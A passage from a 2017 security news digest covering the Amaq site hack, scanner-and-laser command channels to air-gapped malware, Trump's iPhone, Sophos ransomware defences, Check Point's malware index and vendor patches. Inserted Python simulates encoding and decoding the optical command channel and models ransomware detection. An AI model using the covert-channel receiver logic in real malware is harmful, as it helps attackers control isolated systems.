“Amaq News is constantly changing; the group does not maintain a site for a long period of time, whether due to the domain being suspended or taken down, or because the group wants to avoid being attacked,” Laith Alkhouri, Director of Research & Analysis for the Middle East and North Africa and a co-founder at cyber intelligence firm Flashpoint, told SecurityWeek.

“Though I’m not able to verify the hack, Amaq indeed released a statement warning that Amaq’s latest domain was hacked,” Alkhouri said, noting that the group’s website was currently offline.

“The attack appears to have specifically targeted Amaq after pinning down a specific vulnerability, which indicates a more targeted attack rather than a random one,” Alkhouri said. “The file might have aimed to infect machines in order to track the individuals who download the allegedly infected file rather than just merely damage their machines. The likelihood is that this attack, if ascertained, was not financially motivated.”

While it is unclear who may be behind the attack, U.S. Cyber Command (CYBERCOM), part of the U.S. Department of Defense, has publicly acknowledged that it has been conducting offensive cyber operations against jihadist targets.

Alkhouri said it is not clear whether the agency is carrying out these types of attacks.

“ISIS affiliated websites and accounts have previously been targeted multiple times; on more than one occasion, anti-ISIS hackers were behind these attacks,” Alkhouri said.

In June 2016, ISIS warned its supporters that a fake version of an Amaq News Agency Android mobile app was being used to spy on users.

Last April Flashpoint published a report concluding that the cyber capabilities of the Islamic State and its supporters are still relatively weak and appear to be underfunded and poorly organized. While the terrorist group has ambitions to increase its cyber capabilities, so far the online attacks claimed by pro-ISIS hackers remain relatively novice-level, Flashpoint says, with most attacks being opportunistic, such as exploiting known vulnerabilities to compromise websites and launching DDoS attacks.

“Pro-ISIS cyber actors are certainly under sophisticated right now, but there is clear evidence that they are growing in number, coalescing in rank, and zooming in on American and other Western targets,” Alkhouri told SecurityWeek last year. “The more attractive the targets, the more notoriety they are gaining.”


Hackers Can Use Scanners to Control Air-Gapped Malware

31.3.2017 securityweek Virus
Researchers have published a paper describing how a piece of malware planted on an air-gapped network can be controlled remotely using an office scanner and a light source, such as a laser or a smart bulb.

The method of using scanners to jump the air gap was first summarized back in 2014 at the Black Hat Europe conference by Adi Shamir, professor of Applied Mathematics at the Weizmann Institute of Science and one of the inventors of the RSA algorithm. Shamir along with Ben Nassi and Yuval Elovici of the Ben-Gurion University of the Negev in Israel have now published a detailed research paper on this attack method.

The experiments conducted by the experts show that an attacker can send commands to a piece of malware on an isolated machine by pointing a light source at a connected flatbed scanner that has its lid open from outside the building housing the device.

The malware can be programmed to initiate scans at a specified time and date when the attacker will start sending the commands. Researchers pointed out that only the first scan date needs to be set as subsequent dates can be supplied in each attack.

The commands are transmitted as pulses from a laser or a different light source – a 1 bit is transmitted when the light source is on, and a 0 bit is sent when it’s off. The light source can be a visible laser or an invisible infrared laser, which makes the attack stealthier. The light source can be attached to a stand or a drone.

The laser attack works if there is a clear line of sight from the outside of the building to the scanner. If the view is blocked by a curtain or a wall, the attacker can remotely hijack a smart bulb located in the same room as the targeted scanner and use it to send the signals.

When Shamir first mentioned the attack method, he only described a scenario involving a laser attached to a drone. In the paper they published now, the researchers also detailed an attack involving smart bulbs, which have been known to be vulnerable to remote hacking.

In their experiments, the experts flew a drone to the third floor of an office building at a distance of 15 meters (50 feet) from the scanner. Using a transmission rate of 50 milliseconds for each bit, they managed to send the command “d x.pdf,” which can be a command for deleting a file named “x.pdf,” in 3.2 seconds. A stronger laser allowed them to conduct a successful attack from 900 meters away (0.55 miles).

In the smart bulb attack scenario, which involves hijacking the bulb and commanding it to turn on and off to transmit 1 and 0 bits, instructions were sent to the malware from a car passing by the targeted building. In this experiment, researchers simulated a ransomware attack, where the threat actor sent four bytes of data in the form of a “en q” command (i.e. encrypt directory q). The attack was carried out in four seconds at a 100 millisecond transmission rate.
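The channel the two experiments use is plain on/off keying: the light is on for one bit period to send a 1 and off to send a 0, so the raw payload time is simply the number of bits times the bit period. The software model below, an added example rather than the researchers' code, lays a command out as pulses, computes that raw time for the article's two commands and bit rates, and then plays the receiver's role of sampling brightness and recovering the bytes. It touches no hardware; the brightness samples are constructed, and it assumes 8 bits per ASCII character sent most-significant bit first, no framing or error correction (so it does not reproduce the paper's slightly longer reported timings), and four receiver samples per bit.

```python
"""Added example: a software model of the on/off-keyed optical channel
described in the article (1 = light on for one bit period, 0 = off).

Assumptions: 8 bits per ASCII character, MSB first, no framing, no error
correction, SAMPLES_PER_BIT brightness samples per bit at the receiver.
Brightness values are constructed; no scanner, laser or bulb is involved.
"""

SAMPLES_PER_BIT = 4


def to_bits(command: str) -> list:
    """Command text -> list of bits, one byte per ASCII character, MSB first."""
    return [(b >> i) & 1 for b in command.encode("ascii") for i in range(7, -1, -1)]


def payload_seconds(command: str, bit_ms: float) -> float:
    """Raw on-air time of the payload bits at the given bit period (ms)."""
    return len(to_bits(command)) * bit_ms / 1000


def light_schedule(command: str, bit_ms: float) -> list:
    """Run-length form of the transmission: [(state, duration_ms), ...],
    i.e. how long the light stays on or off for each run of equal bits."""
    runs = []
    for bit in to_bits(command):
        if runs and runs[-1][0] == bit:
            runs[-1] = (bit, runs[-1][1] + bit_ms)
        else:
            runs.append((bit, bit_ms))
    return runs


def transmit(command: str, samples_per_bit: int = SAMPLES_PER_BIT,
             on: float = 0.9, off: float = 0.1) -> list:
    """Constructed brightness trace a scanner would see: bright while the
    light is on, dim while it is off, samples_per_bit readings per bit."""
    return [on if bit else off
            for bit in to_bits(command) for _ in range(samples_per_bit)]


def receive(samples: list, samples_per_bit: int = SAMPLES_PER_BIT) -> str:
    """Recover the text: threshold at the midpoint between the darkest and
    brightest reading, average each bit slot, repack 8 bits per byte."""
    threshold = (min(samples) + max(samples)) / 2
    bits = []
    for i in range(0, len(samples) - samples_per_bit + 1, samples_per_bit):
        slot = samples[i:i + samples_per_bit]
        bits.append(1 if sum(slot) / len(slot) > threshold else 0)
    out = bytearray()
    for j in range(0, len(bits) - 7, 8):
        out.append(int("".join(map(str, bits[j:j + 8])), 2))
    return out.decode("ascii", errors="replace")


def noisy_trace(command: str) -> list:
    """Constructed trace with deterministic +/-0.15 jitter on every sample,
    to show the per-slot averaging still recovers the bits."""
    return [s + (0.15 if i % 3 else -0.15)
            for i, s in enumerate(transmit(command))]


if __name__ == "__main__":
    for cmd, bit_ms in [("d x.pdf", 50), ("en q", 100)]:
        print(repr(cmd), len(to_bits(cmd)), "bits,",
              payload_seconds(cmd, bit_ms), "s raw at", bit_ms, "ms/bit")
        print("  runs:", light_schedule(cmd, bit_ms)[:6], "...")
        print("  decoded:", repr(receive(noisy_trace(cmd))))
```

At 50 ms per bit the seven-character "d x.pdf" is 56 bits, 2.8 s of payload, and "en q" at 100 ms per bit is 32 bits, 3.2 s; the article's 3.2 s and 4 s figures are a little longer, which the model does not account for since it carries no preamble or framing. The run-length view is the useful one for a defender: a sequence of light pulses in the tens-of-milliseconds range hitting a scanner bed is not something a normal scan job produces, and the receiver's sampling rate (four samples per bit here) sets how fast a channel the scanner's line rate could actually support.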

Researchers pointed out that this is a two-way communication channel, as the malware can use the scanner itself to emit visible light pulses that can be captured and decoded by a video recorder mounted on a drone. Videos have been published showing both the laser and smart bulb attacks.

This is not the only method devised by researchers for jumping air gaps. Over the past months, they have detailed several techniques, including ones involving HDD activity LEDs, USB devices, the noise emitted by hard drives and fans, and heat emissions.
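As an added illustration (not the researchers' code), the decoder below thresholds a constructed light-sensor trace keyed the way described above, majority-votes each 50 ms bit window back into ASCII, and checks the raw payload time budget against the reported figures; a run-length test shows how a lamp monitor placed at a scanner could tell such keying apart from ordinary ambient light changes. The sensor sampling interval and the on/off sensor levels are assumed values.

```python
"""Decoding and sanity-checking an on-off-keyed light trace (constructed illustration)."""
from typing import List, Tuple

BIT_PERIOD_MS = 50        # 50 ms per bit, as in the drone experiment
SAMPLE_PERIOD_MS = 5      # assumed light-sensor sampling interval
DARK, LIT = 12, 240       # assumed sensor readings with the light off / on


def bits_from_text(text: str) -> List[int]:
    """ASCII bytes, most significant bit first."""
    return [(byte >> i) & 1 for byte in text.encode("ascii") for i in range(7, -1, -1)]


def text_from_bits(bits: List[int]) -> str:
    """Pack whole groups of eight bits back into ASCII; a trailing partial byte is dropped."""
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return out.decode("ascii", errors="replace")


def simulate_trace(bits: List[int], bit_ms: int = BIT_PERIOD_MS,
                   sample_ms: int = SAMPLE_PERIOD_MS) -> List[int]:
    """Constructed sensor trace: the lamp holds one level per bit period,
    with a small deterministic jitter so the decoder has to threshold."""
    per_bit = bit_ms // sample_ms
    trace = []
    for bit in bits:
        level = LIT if bit else DARK
        trace.extend(level + (k * 7) % 5 - 2 for k in range(per_bit))
    return trace


def run_lengths(trace: List[int]) -> List[Tuple[int, int]]:
    """(level, length) runs after thresholding at the midpoint of the trace."""
    threshold = (max(trace) + min(trace)) / 2
    runs: List[Tuple[int, int]] = []
    for sample in trace:
        level = 1 if sample > threshold else 0
        if runs and runs[-1][0] == level:
            runs[-1] = (level, runs[-1][1] + 1)
        else:
            runs.append((level, 1))
    return runs


def is_keyed(trace: List[int], bit_ms: int = BIT_PERIOD_MS, sample_ms: int = SAMPLE_PERIOD_MS,
             min_transitions: int = 8, tolerance: int = 1) -> bool:
    """Flag a trace whose on/off run lengths all sit on one fixed bit clock.
    Ambient changes (a door, a cloud) are few and are not aligned to any period."""
    per_bit = bit_ms // sample_ms
    runs = run_lengths(trace)
    if len(runs) - 1 < min_transitions:
        return False
    return all(min(n % per_bit, per_bit - n % per_bit) <= tolerance for _, n in runs)


def decode_trace(trace: List[int], bit_ms: int = BIT_PERIOD_MS,
                 sample_ms: int = SAMPLE_PERIOD_MS) -> str:
    """Majority vote over each bit window, then pack the bits into ASCII."""
    per_bit = bit_ms // sample_ms
    threshold = (max(trace) + min(trace)) / 2
    bits = []
    for i in range(0, len(trace) - len(trace) % per_bit, per_bit):
        ones = sum(1 for s in trace[i:i + per_bit] if s > threshold)
        bits.append(1 if ones * 2 > per_bit else 0)
    return text_from_bits(bits)


def payload_seconds(text: str, bit_ms: int) -> float:
    """Raw payload time at one bit per period. The reported 3.2 s for "d x.pdf" at 50 ms
    and 4 s for "en q" at 100 ms sit above this because of framing overhead."""
    return len(text) * 8 * bit_ms / 1000


if __name__ == "__main__":
    trace = simulate_trace(bits_from_text("d x.pdf"))
    print(is_keyed(trace), repr(decode_trace(trace)), payload_seconds("d x.pdf", 50))
```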


With New iPhone, Trump Still a Target for Hackers

31.3.2017 securityweek Apple
President Donald Trump has a new phone. An iPhone.

That would not ordinarily be news, but given the security concerns about the risk of hack attacks on the prolific White House tweeter, the shift is significant.

Cybersecurity specialists say Trump's decision to transition from his Android device -- details of which were never disclosed but which was believed to be an unsecured, older-model Samsung -- is positive for security, but doesn't eliminate risks from hackers.

"I can guarantee the Russians and Chinese will try to figure out an attack," said John Dickson, a former air force cybersecurity officer who now works for the Texas-based Denim Group consulting firm.

White House social media chief Dan Scavino confirmed the smartphone shift this week, tweeting that Trump "has been using his new iPhone for the past couple of weeks here on Twitter. Yes, it is #POTUS45 reading & tweeting!"

Dickson said security will depend on how the president is using the device -- whether it is exclusively for tweeting -- and if it is plugged into an enterprise management system that can "wall off" vulnerabilities.

"If it's a single-purpose device, the risk is minimal," he said. "But as soon as you start clicking on things, downloading apps, granting access, that's when things matter tremendously."

Mobile devices can be hacked to allow an attacker to listen via the phone's microphone, access its camera, monitor geolocation or even take over the handset remotely.

Former president Barack Obama carried a BlackBerry, and later a different smartphone, with security modifications that limited its functions.

Trump's switch comes despite his call for a boycott a year ago of the iPhone maker for refusing FBI requests to help hack a device for a probe into a deadly California attack.

- More secure? -

Some analysts say Apple devices may offer more security because the company controls the hardware and software and frequently updates its operating system. Apple did not respond to an AFP query on Trump's decision.

Betsy Cooper, executive director of the University of California's Center for Long-Term Cybersecurity, said that despite Apple's reputation, recent research has shown "that both iPhones and Android can be abused by hackers."

Cooper said it remains unclear how the president's social media is managed -- what devices are used and who has access to his personal @realDonaldTrump and official @POTUS handles on Twitter.

From a security standpoint, "it would be better to eliminate the personal accounts and use only government devices and government-protected social media accounts," Cooper said.

Concerns of hacking come following Trump's unverified allegation that his phones were tapped during last year's election campaign, and after leaked documents from former contractor Edward Snowden showed US tapping of German leader Angela Merkel's personal phone.

Some phones are marketed as "hardened" or secure devices for people in power, but it wasn't clear if these are used at the White House.

- Phone as 'honeypot'? -

Nicholas Weaver, a researcher at the California-based International Computer Science Institute, said Trump's phone swap "massively reduces, but does not completely eliminate, the security risks."

But while he agreed foreign governments are likely to try to hack the phone, Weaver said US intelligence services may have modified it to be "a nice honeypot to trap attempted attacks."

A honeypot is a technique used to lure hackers and attackers to identify them and find ways to neutralize or punish them.

Weaver said in a blog post earlier this year that Trump's use of an older Android device opened massive security risks and that "the working assumption should be that Trump's phone is compromised by at least one -- probably multiple -- hostile foreign intelligence services."

At the time, it was not clear what type of handset Trump was using, but a New York Times report after the inauguration said he was using "his old, unsecured Android phone."

Last month, Representative Ted Lieu of California called for an investigation, saying Trump's phone use may be "jeopardizing national security."

Dickson said that even with strong security, the president could fall victim to an attack if he uses his phone for email and web browsing.

This could be in the form of "spearphishing," or a message disguised to look as if it's from a trusted aide or family member, but which contains malware.

"This is what sophisticated attackers do," Dickson said, and because the president's activities are widely known, "he would be an easier target for spearphishing."


Afraid of ransomware? Maybe you no longer need to be...

31.3.2017 SecurityWorld Security
Sophos presented its key technology Intercept X for fighting ransomware and advanced threats in Prague as part of its European roadshow. The presentation was backed not only by practical demonstrations of how the whole solution works, but also by the venue, a futuristic truck that drew the attention of the whole neighbourhood.

But back to the security technologies. Ransomware is currently a threat feared by companies and households alike -- a moment is all it takes and the files are encrypted. Pay, or give up? Yet it would take little for such a situation never to arise, says Peter Skondro, senior sales engineer at Sophos, who explained the advantages of the Intercept X solution to the audience.

According to him, Intercept X is a supplementary protection against malware, and it is especially effective against ransomware, where traditional anti-malware usually fails.

Thanks to advanced detection of exploit techniques, it can effectively block many zero-day attacks as well, and combined with other Sophos technologies it forms an effective barrier against almost any type of attack on corporate workstations.

Because Intercept X works as an add-on to classic endpoint protection, it can be combined not only with other Sophos solutions but essentially with any third-party endpoint protection system, and thanks to its minimal footprint it also works well on older, less powerful computers (Intercept X currently supports computers running Windows 7 and newer; Mac OS support is planned).

According to Skondro, Intercept X comprises four key layers of protection:

Anti-ransomware, which detects and stops unwanted encryption of data and can also restore files that have already been encrypted,
Anti-Exploit, which can block zero-day malware intrusion and has minimal impact on system performance,
Extended Cleanup (deep malware removal), which uses forensic analysis to remove various types of threats without knowing any of their signatures,
Root Cause Analysis, which analyses the malware attack in detail.

How effective is malware containment?

According to Skondro, endpoint malware can be eliminated by several different methods. Most often this means restricting the areas through which malware can enter the endpoint – whether through various types of filtering, reputation settings for downloaded files and so on. This can block up to 80% of all malicious code.

The second key method is pre-execution analysis, such as heuristics – this can eliminate up to 10% of malware. And then of course there are signatures of known strings, which catch around 5% of malicious code.

The methods described above, however, concern traditional malware. Modern malware can evade the detection methods mentioned above very successfully. But according to Skondro even that can be beaten – thanks to behavioural analysis and exploit technique detection, the remaining 3% and 2% of infections respectively can be eliminated. And it is precisely these last two methods that appear to be key in today's malware world.

1. Eliminating ransomware

The foundation of protection against ransomware is the CryptoGuard technology. It can very effectively detect suspicious data encryption and stop it before it does any damage on endpoints.

When any file is opened by some process, CryptoGuard automatically creates a backup copy of the original file, and when the file is closed and written, this copy is compared with the newly written one, Skondro explains. If CryptoGuard detects fundamental changes or even a change of file type, the file is considered encrypted.

If such a detection occurs for multiple files within a short time period, CryptoGuard considers the computer to be attacked by as yet unknown ransomware. The process performing such operations on files is quarantined and stripped of its right to write to the file system.

Throughout, the user's screen shows the equivalent of a traffic light indicating the state of the user's endpoint (green -- everything OK, yellow -- something is happening, red – attention, security problems have occurred). At this point the red light comes on at the endpoint.

Thanks to the preceding steps, CryptoGuard can restore the operation of the endpoint as well as the files encrypted by the ransomware -- they can be recovered from the previously created copies of the opened files.

At the same time, an alarm is sent to the central management console, the information needed for a detailed analysis of the situation starts to be collected, and deep malware removal using the Sophos Clean function is launched, see below.

At the end of the whole remediation process there are unencrypted files with their original content and a restored system free of infection – the traffic light turns green again.

It works similarly when the ransomware is on a remote client that accesses a file server – when files are opened, a backup copy is again created and compared with the newly written file.

If any discrepancies are found, see above, CryptoGuard marks the remote client as infected by ransomware and revokes its access to the file system. The original data is restored from the copies and a corresponding alert is sent to central management.
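The open-time copy, close-time comparison, burst counting and roll-back described above, as a toy model added here (not Sophos code): a file is judged encrypted when its type changes or its content is replaced by high-entropy bytes, verdicts are counted per process in a sliding window, and a burst quarantines the process, restores the copies and drives the traffic light. The window, threshold, type detector and the in-memory "disk" are assumptions.

```python
"""Toy model of open-time shadow copies plus burst counting (constructed illustration)."""
import hashlib
import math
from collections import Counter, defaultdict, deque

BURST_WINDOW_S = 2.0    # assumed "short time window"
BURST_THRESHOLD = 3     # assumed number of suspicious rewrites before quarantine
MAGIC = {b"%PDF": "pdf", b"\x89PNG": "png", b"PK\x03\x04": "zip", b"\xd0\xcf\x11\xe0": "ole"}


def file_kind(data: bytes) -> str:
    """Coarse file-type guess from leading bytes (stands in for a real type detector)."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    sample = data[:512]
    if sample and all(32 <= b < 127 or b in b"\r\n\t" for b in sample):
        return "text"
    return "binary"


def entropy_bits(data: bytes) -> float:
    """Shannon entropy in bits per byte; ciphertext sits close to 8.0."""
    if not data:
        return 0.0
    counts = Counter(data)
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts.values())


def looks_encrypted(before: bytes, after: bytes) -> bool:
    """One close/write verdict: the type changed, or the content became high-entropy bytes."""
    if not after:
        return False
    if file_kind(before) != file_kind(after):
        return True     # caveat: a legitimate conversion (e.g. text -> zip) trips this too
    unchanged = sum(a == b for a, b in zip(before, after)) / max(len(before), 1)
    return entropy_bits(after) > 7.0 and unchanged < 0.2


class ShadowGuard:
    def __init__(self, files: dict):
        self.files = dict(files)            # path -> bytes, an in-memory stand-in for the disk
        self.shadow = {}                    # (pid, path) -> copy taken at open
        self.verdicts = defaultdict(deque)  # pid -> (time, path, copy) inside the window
        self.quarantined = set()
        self.lights = ["green"]             # traffic-light history shown to the user
        self.alerts = []                    # what would go to central management

    def _light(self, colour: str) -> None:
        if self.lights[-1] != colour:
            self.lights.append(colour)

    def open(self, pid: int, path: str) -> None:
        if pid in self.quarantined:
            raise PermissionError(f"pid {pid} is quarantined")
        self.shadow[(pid, path)] = self.files[path]     # backup copy at open

    def write_close(self, pid: int, path: str, data: bytes, t: float) -> None:
        if pid in self.quarantined:
            raise PermissionError(f"pid {pid} lost its write right")
        before = self.shadow.pop((pid, path))
        self.files[path] = data
        if not looks_encrypted(before, data):
            return
        window = self.verdicts[pid]
        window.append((t, path, before))
        while t - window[0][0] > BURST_WINDOW_S:     # keep only the recent burst
            window.popleft()
        self._light("yellow")
        if len(window) >= BURST_THRESHOLD:
            self._quarantine(pid)

    def _quarantine(self, pid: int) -> None:
        self._light("red")
        self.quarantined.add(pid)
        restored = []
        for _, path, copy in self.verdicts.pop(pid):
            self.files[path] = copy         # roll back from the open-time copies
            restored.append(path)
        self.alerts.append({"pid": pid, "restored": restored})
        self._light("green")                # remediation done: original content is back


def pseudo_ciphertext(seed: bytes, length: int) -> bytes:
    """Deterministic high-entropy bytes standing in for ransomware output (constructed)."""
    out, block = b"", seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:length]
```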

2. Detecting malware through exploit techniques

Today there is a whole range of exploit techniques by which a user's endpoint can be compromised, says Skondro. According to him, Intercept X can monitor such processes and detect attempts to use exploits that employ techniques such as buffer overflow or code injection. In this way it prevents the exploitation of various vulnerabilities in insecure applications or in programs where the corresponding patches have not yet been installed.

The whole solution is not signature-based, so it can eliminate unknown risks as well. By its architecture it also has no impact on overall system performance.

3. Root cause analysis

Intercept X also includes a sophisticated system for analysing the root causes of incidents. Merely disconnecting an affected workstation, according to Skondro, says nothing about what exactly happened, which systems or files were affected by the incident and how the problem can be prevented in the future.

It is precisely these questions that the root cause analysis system answers. Through detailed examination it identifies the affected processes, registry keys, files and communication channels, shows the individual events and their relationships in a detailed graphic, and determines the original source of the infection. It also determines which files and systems were affected by the event and which systems should be cleaned.

The root cause analysis system can also advise how to avoid a similar infection next time, Skondro adds. For example, which malware entry channels should be closed or how to effectively prevent malware from spreading inside the corporate network.

4. Deep malware removal

For advanced elimination of a cyber infection, Intercept X uses the Sophos Clean tool, an on-demand malware scanner and cleaner that works without the need for any signatures. Using forensic methods it can detect both known and unknown malware, says Skondro.

It uses behavioural detection together with cloud threat intelligence. It can also find and remove persistent malicious code and replace any compromised Windows system files with original versions.

Integration with other Sophos solutions

Intercept X is only a sophisticated add-on to classic endpoint protection, so for full protection it must be combined with other defensive technologies.

For example, combined with Sophos Central Endpoint Advanced, in addition to the Intercept X functions described above you also get classic anti-malware protection, malicious traffic detection, HIPS, web, application and data control, web filtering on endpoints, central management and a range of other functions that give users comprehensive endpoint protection, Skondro explains.

The next level is integrating Intercept X with Sophos XG next-generation firewalls (NGFW) and the SafeGuard Encryption solution. This uses the Security Heartbeat shared intelligence ecosystem, which synchronises security across multiple solutions in real time, improving the effectiveness of protection.

Intercept X as an add-on

How Intercept X complements existing endpoint protection solutions

(Source: Sophos)

An example of how effectively such a combined defence can work is a situation where Endpoint Advanced or Intercept X detects an infection on an endpoint; through Security Heartbeat this message reaches the SafeGuard Encryption agent, which immediately wipes from the device's memory the encryption keys that could be abused. Security Heartbeat then informs the relevant firewall of the compromised workstation, and the firewall disconnects it from the network or quarantines it until the malware is removed, Skondro explains.

Sophos calls such interconnected defence Synchronized Security. It replaces the until recently used concept in which security solutions coordinated their activity with each other only exceptionally and were therefore not very effective against new types of threats.

According to Skondro, Synchronized Security can not only detect an infection but also determine which systems were actually affected, take the appropriate remediation steps and, moreover, give administrators a detailed analysis of what actually happened and how to prevent it next time. And that is something that until recently was only a dream of security managers.


In February, the most widespread malware family was the Kelihos botnet

31.3.2017 SecurityWorld Viruses
Check Point Software Technologies has published its February Global Threat Impact Index, in which the Hancitor downloader placed in the Top 5 most widespread malware families for the first time.

A ranking of the countries most frequently targeted by cyberattacks was also released. The Czech Republic saw an increase in attacks and moved up 15 places to the more dangerous 41st position. Slovakia, on the other hand, moved 36 places towards the safer countries and currently holds 65th position.

Zambia, which moved up 13 places, took first place in the Threat Index. The biggest jump among the more dangerous countries was made by Qatar, which leapt from 118th to 58th. Overall the ranking saw many changes in February, with a number of more dangerous countries moving towards the safer ones and vice versa.

The Hancitor downloader, which installs banking trojans or ransomware on infected devices, moved up 22 places after more than tripling its global impact in the past month. Hancitor, sometimes also called Chanitor, usually spreads via Office documents with macros in phishing e-mails carrying "important" messages such as voicemails, faxes or invoices.

The Index rated Kelihos, a botnet used for bitcoin theft, as the most widespread malware family, affecting 12% of organisations worldwide. Kelihos has been active since 2010 and has managed to adapt from ordinary spam campaigns to renting out the botnet for sending spam to anyone willing to pay. Although it was taken down in 2011 and again a year later, it continued to develop and transform into a botnet and more than tripled in just two days last August. Kelihos is currently still growing and is one of the most significant spam distributors in the world. It has an "army" of more than 300,000 infected computers, each of which can send more than 200,000 e-mails every day.

Analysis of the Top 3 malware families shows that hackers use a wide range of attack vectors and tactics in attacks on organisations. These threats affect the entire infection chain, including spam e-mails spread by botnets and downloaders that ultimately place ransomware or a trojan on the victim's computer.

The Top 3 most widespread malicious codes in February were Kelihos, which affected 12% of organisations, HackerDefender, which impacted 5%, and Cryptowall, which affected 4.5% of organisations worldwide.

Top 3 - malware:

Kelihos - Botnet focused mainly on bitcoin theft and sending spam. It uses peer-to-peer communication, which allows every individual node to act as a C&C server.
HackerDefender - A user-mode rootkit for Windows that can be used to hide files, processes and registry keys, and also to implement a backdoor and port redirection that works via TCP ports opened by existing services. The hidden backdoors therefore cannot be found by traditional methods.
Cryptowall – Ransomware that started as a Cryptolocker doppelgänger but eventually surpassed it. After the takedown of the Cryptolocker ransomware, Cryptowall became one of the most prominent ransomware families of today. Cryptowall is known for using AES encryption and communicating with its C&C server over the anonymous Tor network. It spreads via exploit kits, malvertising and phishing campaigns.

There were several interesting changes in mobile malware. The most active variant in February was Hiddad, which jumped to the top from 3rd place, Hummingbad came second, and the Triada backdoor dropped from first to third.

Top 3 - mobile malware:

Hiddad – Android malware that repackages legitimate apps and then places them in third-party stores. Its main function is displaying ads, but it can also gain access to key security information contained in the operating system, allowing an attacker to obtain sensitive user data.
Hummingbad - Malware targeting Android devices that establishes a persistent rootkit on the device, installs fraudulent apps and enables further malicious activity such as installing a keylogger, stealing credentials and bypassing e-mail encryption to better capture corporate data.
Triada - A modular backdoor for Android that grants superuser privileges to downloaded malware and helps inject it into system processes. Triada can also spoof URLs stored in the browser.

"The rise in the use of various malware variants shows the problems IT departments around the world are facing. It is essential that organisations equip themselves adequately to fight the ever-growing number of threats and deploy advanced security systems across the entire corporate network," says Peter Kovalčík, SE Manager at Check Point.

Check Point also analysed malware attacking corporate networks in the Czech Republic, and the rise of new malicious codes continued in February. After its marked dominance during 2016, Conficker placed only 4th in February.

The Kelihos botnet, on the other hand, jumped to first place, pushing the Cryptowall ransomware to second. The HackerDefender rootkit was in 3rd place.

Top 10 malware families in the Czech Republic – February 2017 (malware family – description):

Kelihos – The Kelihos botnet (also known as Hlux) is a P2P botnet involved mainly in bitcoin theft, bitcoin mining and sending spam. It spreads via spam containing links to further malware. The botnet can also communicate with other computers and exchange information about sending spam, steal sensitive information or download and run malicious files. Later versions mostly spread via social networking sites, especially Facebook.
Cryptowall – Cryptowall is a major ransomware trojan that encrypts files on the infected computer and then demands that users pay a ransom for decryption. It spreads via malvertising and phishing campaigns. Cryptowall first appeared in 2014.
HackerDefender – HackerDefender is a rootkit for Windows 2000 and Windows XP and can also work on later versions of Windows NT. The rootkit modifies various Windows functions and APIs to evade detection by security software. HackerDefender is widespread because it is freely available on the internet and easy to install.
Conficker – Conficker is a computer worm targeting the Windows operating system. It exploits vulnerabilities in the operating system and tries to guess the administrator password for further spreading and botnet creation. The infection allows the attacker to access users' personal data such as banking details, credit card numbers or passwords. The worm originally targeted users of communication sites such as Facebook, Skype and e-mail sites.
Fareit – Fareit is a trojan first detected in 2012; its variants usually steal user names and passwords stored in web browsers. In addition they also steal e-mail and FTP credentials such as directory listing, password, port number, server name, server type and user name.
TorrentLocker – TorrentLocker is a ransomware family that encrypts user documents, images and other file types. The attackers demand a payment of 4.1 bitcoins (approximately 1,800 dollars) from the victim for decryption.
Slammer – A memory-resident worm that specifically targets Microsoft SQL 2000. Its rapid spread makes it possible to use it for DoS attacks on selected targets.
Delf – Delf is a large family of trojans used for data theft. Some variants differ so significantly that they are classified as worms or viruses. Their malicious activities vary widely, from terminating processes and stealing data to downloading further malware.
RookieUA – RookieUA is designed to steal information. It obtains user account information such as login names and passwords and sends it to a remote server. HTTP communication uses the unusual user agent RookIE/1.0.
Hancitor – A downloader used to install malicious code such as banking trojans and ransomware on infected machines. Hancitor, sometimes also called Chanitor, usually spreads via Office documents with macros in phishing e-mails carrying "important" messages such as voicemails, faxes or invoices.
Graftor – Graftor is adware that abuses the web browser. Its characteristics resemble a trojan. It can be used as a tool to download further malicious code. It is also known for hiding executable commands and DLLs in PNG files to evade detection. Some vendors see it only as an unwanted program, but Graftor has rootkit capabilities and C&C functions that make it far more dangerous malware than plain adware.

The ThreatCloud Map online cyber threat map tracks in real time how and where cyberattacks are taking place around the world, using information from Check Point ThreatCloud, the largest collaborative network for fighting cyber threats, and brings threat data and trends from a worldwide global network of sensors.

The ThreatCloud database analyses more than 250 million addresses and detects possible bot infections, contains more than 11 million malware signatures and more than 5.5 million infected websites, and identifies millions of malware types every day.


Major Windows 10 update to be released on April 11

31.3.2017 Novinky/Bezpečnost Vulnerabilities
The long-awaited update to the Windows 10 operating system, which will bring a range of new features, will be released by Microsoft on April 11. Representatives of the American computer giant confirmed this on Wednesday.
Microsoft's developers have been preparing the release of the update known as the Creators Update for the past several months. Exactly when they would release it was not certain until now, although speculation had surfaced earlier that it would happen during April. It is now clear that it will happen on Tuesday, April 11.

As the name itself suggests, with the update the American software giant will focus primarily on creatives. "The update is designed to support creativity and help bring your ideas to life with tools that will be an integral part of Windows 10 from April 11," Microsoft representatives say of the new features.

3D technology and gamers
With the new update, the American software giant will focus mainly on the capabilities of the Windows 10 operating system in the area of 3D technology. For example, Paint will be reworked so that three-dimensional objects can be easily created in it. Naturally, far more creative tools will be available.

Attention was also paid to gamers in the update. Users will, for example, be able to easily stream their battles with opponents to the internet. It should be easy to create tournaments, literally with a few clicks. Tournaments can be created via the Arena feature, where users set their own rules and determine exactly who can play.

Further improvements should concern the Microsoft Edge browser. And security and privacy protection will not be left out either.

Second major update
Ars Technica pointed out that, in addition to the Creators Update, Microsoft is preparing another major update for this year. Its editors obtained the American company's plans, from which this is clearly evident.

Although no exact date was given, the plans show that the update should be released during this autumn. A question mark hangs over what new features the second major update should bring.


Apple patches more than 200 security bugs

31.3.2017 Novinky/Bezpečnost Apple
Computers with the bitten apple logo, smartphones, but also smart watches, for example. Currently there is practically no Apple product whose software does not contain some security flaw. The American computer giant is patching more than two hundred holes at once.
Machines with the bitten apple logo are generally considered the safer ones. And compared with many competitors, that generally really is the case.

Nevertheless, so many bugs have now accumulated in the American computer giant's software products that it is an absolute record – as stated above, there are more than 200 of them.

Windows users at risk too
The flaws are contained in the iOS operating system for iPhone smartphones and the iPod multimedia player, but likewise in its desktop counterpart macOS, used by desktop computers and notebooks with the bitten apple logo.

Bugs were also discovered in the watchOS platform for smart watches and tvOS for television systems. The professional macOS Server system and the Pages office suite were not spared fixes either.

